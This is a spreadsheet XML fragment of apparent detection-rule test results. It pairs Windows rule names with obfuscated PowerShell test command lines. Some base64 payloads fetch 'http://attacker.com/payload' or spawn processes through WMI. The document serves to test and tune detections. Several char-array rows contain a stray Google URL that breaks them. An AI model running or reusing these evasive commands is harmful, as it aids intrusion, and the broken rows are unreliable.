      <c r="I1358" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1358" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1358" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1359" ht="15.75" customHeight="1" s="42">
      <c r="A1359" s="43" t="n"/>
      <c r="B1359" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1359" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1359" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1359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359" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1359" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1359" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1359" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1359" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1359" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1360" ht="15.75" customHeight="1" s="42">
      <c r="A1360" s="43" t="n"/>
      <c r="B1360" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1360" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1360" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1360" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V2luMzJf')) + [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UHJvY2Vzcw=='))"</t>
        </is>
      </c>
      <c r="F1360" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1360" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1360" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1360" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1360" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1361" ht="15.75" customHeight="1" s="42">
      <c r="A1361" s="43" t="n"/>
      <c r="B1361" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1361" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1361" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1361" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V2luMzJf')) + [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UHJvY2Vzcw=='))"</t>
        </is>
      </c>
      <c r="F1361" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1361" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1361" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1361" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1361" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1361" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1362" ht="15.75" customHeight="1" s="42">
      <c r="A1362" s="43" t="n"/>
      <c r="B1362" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1362" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1362" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1362" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1362" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1362" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1362" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1362" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1362" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1363" ht="15.75" customHeight="1" s="42">
      <c r="A1363" s="43" t="n"/>
      <c r="B1363" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1363" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1363" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1363" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1363" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1363" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1363" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1363" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1363" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1363" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1364" ht="15.75" customHeight="1" s="42">
      <c r="A1364" s="43" t="n"/>
      <c r="B1364" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1364" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1364" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1364" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommanD "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1364" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1364" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1364" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1364" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1364" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1365" ht="15.75" customHeight="1" s="42">
      <c r="A1365" s="43" t="n"/>
      <c r="B1365" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1365" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1365" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1365" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1365" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1365" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1365" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1365" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1365" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1366" ht="15.75" customHeight="1" s="42">
      <c r="A1366" s="43" t="n"/>
      <c r="B1366" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1366" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1366" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1366" s="36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366" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1366" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1366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366" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1366" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1367" ht="15.75" customHeight="1" s="42">
      <c r="A1367" s="43" t="n"/>
      <c r="B1367" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1367" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1367" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1367" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -E JABjAGwAYQBzAHMAIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAgAC0AEwAaQBzAHQAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4ATgBhAG0AZQAgAC0AbQBhAHQAYwBoACAAIgBeAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAJAAiAH0AKQAuAE4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F1367" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1367" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136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367" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1367" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1368" ht="15.75" customHeight="1" s="42">
      <c r="A1368" s="43" t="n"/>
      <c r="B1368" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1368" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1368" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1368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368" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1368" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1368" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1368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368" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1368" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1369" ht="15.75" customHeight="1" s="42">
      <c r="A1369" s="43" t="n"/>
      <c r="B1369" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1369" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1369" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1369" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc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369" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1369" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1369" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1369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369" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1369" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1370" ht="15.75" customHeight="1" s="42">
      <c r="A1370" s="43" t="n"/>
      <c r="B1370" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1370" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1370" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1370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370" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1370" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1370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370" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1370" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1371" ht="15.75" customHeight="1" s="42">
      <c r="A1371" s="43" t="n"/>
      <c r="B1371" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1371" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1371" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1371" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENCOdEDcomMaNd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1371" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1371" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1371" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1371" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c); PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1371" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1371" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1372" ht="15.75" customHeight="1" s="42">
      <c r="A1372" s="43" t="n"/>
      <c r="B1372" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1372" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1372" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1372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372" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1372" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1372" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1372" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1372" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1373" ht="15.75" customHeight="1" s="42">
      <c r="A1373" s="43" t="n"/>
      <c r="B1373" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1373" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1373" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1373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373" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1373" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1373" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1373" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1373" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1374" ht="15.75" customHeight="1" s="42">
      <c r="A1374" s="43" t="n"/>
      <c r="B1374" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1374" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1374" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1374" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AQwBsAGEAcwBzACAAdwBJAG4AMwAyAF8AcAByAE8AYwBlAFMAcwAgAC0ATgBhAG0AZQAgAEMAcgBlAGEAdABlACAALQBBAHIAZwB1AG0AZQBuAHQATABJAHMAdAAgACIAYwBhAGwAYwAuAGUAeABlACIA</t>
        </is>
      </c>
      <c r="F1374" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1374" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1374" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1374" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1374" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1375" ht="15.75" customHeight="1" s="42">
      <c r="A1375" s="43" t="n"/>
      <c r="B1375" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1375" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1375" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1375" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcOdEdCOMMAnD SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AQwBsAGEAcwBzACAAdwBJAG4AMwAyAF8AcAByAE8AYwBlAFMAcwAgAC0ATgBhAG0AZQAgAEMAcgBlAGEAdABlACAALQBBAHIAZwB1AG0AZQBuAHQATABJAHMAdAAgACIAYwBhAGwAYwAuAGUAeABlACIA</t>
        </is>
      </c>
      <c r="F1375" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1375" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1375" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1375" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1375" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1376" ht="15.75" customHeight="1" s="42">
      <c r="A1376" s="43" t="n"/>
      <c r="B1376" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1376" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1376" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1376" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1376" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1376" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1376" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1376" s="36" t="n"/>
      <c r="J1376" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1376" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1377" ht="15.75" customHeight="1" s="42">
      <c r="A1377" s="43" t="n"/>
      <c r="B1377" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1377" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1377" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1377" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1377" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1377" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1377" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1377" s="36" t="n"/>
      <c r="J1377" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1377" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1378" ht="15.75" customHeight="1" s="42">
      <c r="A1378" s="43" t="n"/>
      <c r="B1378" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1378" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1378" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1378" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1378" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1378" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1378" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1378" s="36" t="n"/>
      <c r="J1378" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1378" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1379" ht="15.75" customHeight="1" s="42">
      <c r="A1379" s="43" t="n"/>
      <c r="B1379" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1379" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1379" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1379" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1379" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1379" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1379" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1379" s="43" t="n"/>
      <c r="J1379" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1379" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1380" ht="15.75" customHeight="1" s="42">
      <c r="A1380" s="43" t="n"/>
      <c r="B1380" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1380" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1380" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1380" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1380" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1380" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1380" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1380" s="36" t="n"/>
      <c r="J1380" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1380" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1381" ht="15.75" customHeight="1" s="42">
      <c r="A1381" s="43" t="n"/>
      <c r="B1381" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1381" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1381" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1381" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1381" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1381" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1381" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1381" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1381" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1382" ht="15.75" customHeight="1" s="42">
      <c r="A1382" s="43" t="n"/>
      <c r="B1382" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1382" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1382" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1382" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcOdEdComMAND SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1382" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1382" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1382" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1382" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1382" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1383" ht="15.75" customHeight="1" s="42">
      <c r="A1383" s="43" t="n"/>
      <c r="B1383" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1383" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1383" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1383" s="36" t="inlineStr">
        <is>
